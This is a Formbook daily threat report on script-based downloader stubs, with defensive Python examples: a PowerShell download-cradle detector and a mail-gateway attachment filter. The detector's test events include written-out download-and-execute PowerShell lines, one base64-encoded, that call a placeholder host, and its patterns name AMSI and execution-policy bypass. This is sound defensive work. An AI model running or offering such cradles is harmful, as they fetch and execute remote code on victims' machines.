Formbook - Daily Threat Report

Monday, May 4, 2026

Daily Summary

Formbook sample volume dropped to 12 on 2026-05-04, a 62% decrease from the 7-day average of 32. This marks a continued decline in activity, with no notable spikes observed today.

New Samples Detected

All 12 new samples are installer or downloader stubs rather than core payloads. The file-type distribution shows a strong pivot to script-based delivery: 7 .js files and 3 .ps1 files dominate, while only 1 .exe and 1 .dll were observed. This packaging shift favors execution through Windows Script Host (wscript.exe/cscript.exe) and PowerShell, likely to slip past application-control policies that only govern native executables.

Distribution Methods

The script-heavy mix suggests delivery through phishing attachments or email links, where .js and .ps1 stubs are used to fetch the main Formbook payload and execute it in memory. The low .exe count implies attackers are moving away from direct executable downloads, preferring fileless staging to evade static detection of the dropped file.

Detection Rate

Detection rates for today's small set are moderate at best, and the scripted stubs are the weak point: a short .js or .ps1 downloader carries little for signature-based engines to match. Behavioral detection around the scripting hosts is therefore critical, since these initial stages often pass static analysis unchecked. Fresh variants using obfuscated PowerShell or JScript, or base64-encoded PowerShell command lines, can be expected to achieve lower initial detection still.
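As an added illustration of the behavioral detection this section and the distribution section call for (not code from the report or from its data sources), the following Python scores PowerShell script-block log text for download-and-execute cradles, decoding -EncodedCommand arguments first so that encoded stubs do not hide from the patterns, and flags Windows Script Host processes that spawn an interpreter. Field names follow Windows Event ID 4104 and Sysmon Event ID 1; the sample events are constructed, example.invalid is a reserved non-routable name, and the indicator weights and alert threshold are assumptions for this example.

```python
"""Behavioural detection for script stubs: score PowerShell script-block text
for download-and-execute cradles (decoding -EncodedCommand first) and flag
Windows Script Host processes that hand off to an interpreter.
Constructed example: the events below are hand-written to resemble Windows
Event ID 4104 and Sysmon Event ID 1 fields, not real Formbook telemetry."""
import base64
import re

# Indicator patterns typical of in-memory staging. Weights and threshold are
# editorial assumptions for this example, not a vendor scoring model.
INDICATORS = {
    "download":   (re.compile(r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I), 2),
    "invoke":     (re.compile(r"Invoke-Expression|\bIEX\b", re.I), 2),
    "reflection": (re.compile(r"Reflection\.Assembly\]::Load", re.I), 2),
    "base64":     (re.compile(r"FromBase64String", re.I), 1),
    "hidden":     (re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I), 1),
    "bypass":     (re.compile(r"-e(?:p|xecutionpolicy)\s+bypass|AmsiUtils", re.I), 2),
}
ALERT_THRESHOLD = 4
# -e, -enc, -EncodedCommand ... followed by a long base64 run (UTF-16LE inside).
ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
HANDOFF_TARGETS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def expand_encoded(text):
    """Append the decoded content of any -EncodedCommand argument so the
    indicator patterns can see through the base64 wrapper."""
    out = text
    for m in ENC_RE.finditer(text):
        try:
            out += "\n" + base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not actually base64 (e.g. '-ExecutionPolicy Unrestricted')
    return out


def score_script_block(script_text):
    """Return (score, sorted indicator names) for one 4104 ScriptBlockText."""
    text = expand_encoded(script_text)
    hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(text))
    return sum(INDICATORS[h][1] for h in hits), hits


def is_wsh_handoff(proc_event):
    """True when a Windows Script Host process spawns an interpreter or LOLBin,
    the .js-to-PowerShell hand-off that script stubs rely on."""
    parent = proc_event["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = proc_event["Image"].rsplit("\\", 1)[-1].lower()
    return parent in SCRIPT_HOSTS and child in HANDOFF_TARGETS


def triage(script_events, proc_events):
    """Collect alerts from both feeds as (source, id, detail) tuples."""
    alerts = []
    for ev in script_events:
        score, hits = score_script_block(ev["ScriptBlockText"])
        if score >= ALERT_THRESHOLD:
            alerts.append(("4104", ev["ScriptBlockId"], hits))
    for ev in proc_events:
        if is_wsh_handoff(ev):
            alerts.append(("sysmon1", ev["ProcessId"], ev["CommandLine"]))
    return alerts


def _encode(cmd):
    """Build a -EncodedCommand argument the way a stub would (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed sample events (example.invalid is a reserved, non-routable name).
STAGER = "powershell.exe -nop -w hidden -enc " + _encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")
SCRIPT_EVENTS = [
    {"ScriptBlockId": "a1", "ScriptBlockText": "Get-ChildItem C:\\Users -Recurse | Where-Object Length -gt 1MB"},
    {"ScriptBlockId": "b2", "ScriptBlockText": "$c=New-Object Net.WebClient;IEX $c.DownloadString('http://example.invalid/stage.txt')"},
    {"ScriptBlockId": "c3", "ScriptBlockText": STAGER},
]
PROC_EVENTS = [
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": STAGER},
    {"ProcessId": 4188, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in triage(SCRIPT_EVENTS, PROC_EVENTS):
        print(alert)
```

The benign Get-ChildItem block scores 0, the plain cradle scores 4, and the encoded cradle scores 5 only because the base64 is expanded before matching; without that step it would score 1 on the hidden-window switches alone. The process-lineage check is deliberately independent of script content, so it still fires when the stub's command line is fully obfuscated.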

C2 Infrastructure

No new C2 servers were reported today. Existing infrastructure appears stable, with no geographic shifts or new IPs observed. Analysts should continue monitoring for dormant or recycled domains from prior campaigns, since a lull in new C2 registrations does not mean old infrastructure has been retired.

7-Day Trend

Activity is clearly cooling down, with today’s sample count representing the lowest point in the week. This decline may indicate a campaign pause or shift to other delivery methods.

Security Analysis

A notable observation is the complete absence of .doc and .xls attachments in today's haul, file types that were previously common for Formbook. This suggests attackers are abandoning macro-laden Office documents in favor of script-only delivery, plausibly because macro blocking in Office and by security products has cut the return on that lure. Actionable recommendations: turn on PowerShell Script Block Logging and keep AMSI-backed script scanning enabled so that obfuscated or encoded stubs are inspected at execution time; restrict PowerShell for standard users (for example through AppLocker or WDAC rules, which also drop unapproved scripts into Constrained Language Mode); change the default handler for .js files from Windows Script Host to a harmless viewer so a double-clicked attachment does not execute; and block .js and .ps1 attachments at the mail gateway, including when they arrive inside archives or behind a double extension such as invoice.pdf.js.
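As an added example of the gateway restriction recommended above (not code from the report or from any gateway product), the following Python policy check inspects a constructed message and rejects script attachments even when they carry a double extension or sit inside a zip, quarantining archives it cannot inspect. The extension list beyond .js and .ps1, the nesting limit and the encrypted-member rule are assumptions for this example.

```python
"""Mail-gateway attachment policy: block script file types, look inside zip
archives, and quarantine what cannot be inspected. Constructed example; the
message and its attachments are built in memory, not taken from real mail."""
import io
import os
import zipfile
from email.message import EmailMessage

# The report calls out .js and .ps1; extending the rule to the sibling types
# Windows hands to Script Host, PowerShell or mshta is an editorial assumption.
BLOCKED_EXT = {".js", ".jse", ".ps1", ".psm1", ".vbs", ".vbe", ".wsf", ".wsh", ".hta"}
MAX_ARCHIVE_DEPTH = 1  # archives nested deeper than this are quarantined unopened


def extension(name):
    """Last extension, lowercased, after the trailing dots/spaces Windows strips.
    Only the final extension picks the handler, so 'invoice.pdf.js' is '.js'."""
    return os.path.splitext(name.strip(" ."))[1].lower()


def inspect_zip(data, prefix, depth, findings):
    """Walk a zip archive given as bytes and append (path, reason) findings."""
    if depth > MAX_ARCHIVE_DEPTH:
        findings.append((prefix, "archive nesting exceeds policy depth"))
        return
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        findings.append((prefix, "unreadable archive"))
        return
    with zf:
        for info in zf.infolist():
            path = f"{prefix}/{info.filename}"
            if info.flag_bits & 0x1:  # encrypted member: contents cannot be checked
                findings.append((path, "encrypted archive member"))
                continue
            ext = extension(info.filename)
            if ext in BLOCKED_EXT:
                findings.append((path, f"blocked script type {ext}"))
            elif ext == ".zip":
                inspect_zip(zf.read(info), path, depth + 1, findings)


def inspect_message(msg):
    """Return (attachment path, reason) pairs that violate the policy.
    An empty list means the message may be delivered."""
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        ext = extension(name)
        if ext in BLOCKED_EXT:
            findings.append((name, f"blocked script type {ext}"))
        elif ext == ".zip":
            inspect_zip(part.get_payload(decode=True), name, 1, findings)
    return findings


def build_zip(members):
    """Construct an in-memory zip from a {name: bytes} mapping (test helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def sample_message():
    """Constructed message: a benign PDF, a double-extension .js, a zip carrying
    a .js stub, and a zip nested inside a zip."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "finance@example.invalid"
    msg["Subject"] = "Invoice"
    msg.set_content("See attached.")
    msg.add_attachment(b"%PDF-1.4 placeholder", maintype="application",
                       subtype="pdf", filename="report.pdf")
    msg.add_attachment(b"var sh = WScript.CreateObject('WScript.Shell');",
                       maintype="application", subtype="octet-stream",
                       filename="Invoice.PDF.js")
    msg.add_attachment(build_zip({"docs/scan_0492.js": b"// stub", "readme.txt": b"hi"}),
                       maintype="application", subtype="zip", filename="Scan_0492.zip")
    inner = build_zip({"scan.js": b"// stub"})
    msg.add_attachment(build_zip({"inner.zip": inner}),
                       maintype="application", subtype="zip", filename="nested.zip")
    return msg


if __name__ == "__main__":
    for path, reason in inspect_message(sample_message()):
        print(f"{path}: {reason}")
```

Python's zipfile cannot write encrypted members, so the encrypted-member branch is not exercised by the sample, but password-protected archives are a standard way to get a stub past inspection and must be quarantined rather than passed. The depth limit serves the same purpose: anything the gateway cannot fully open is treated as a violation, not as clean.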

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
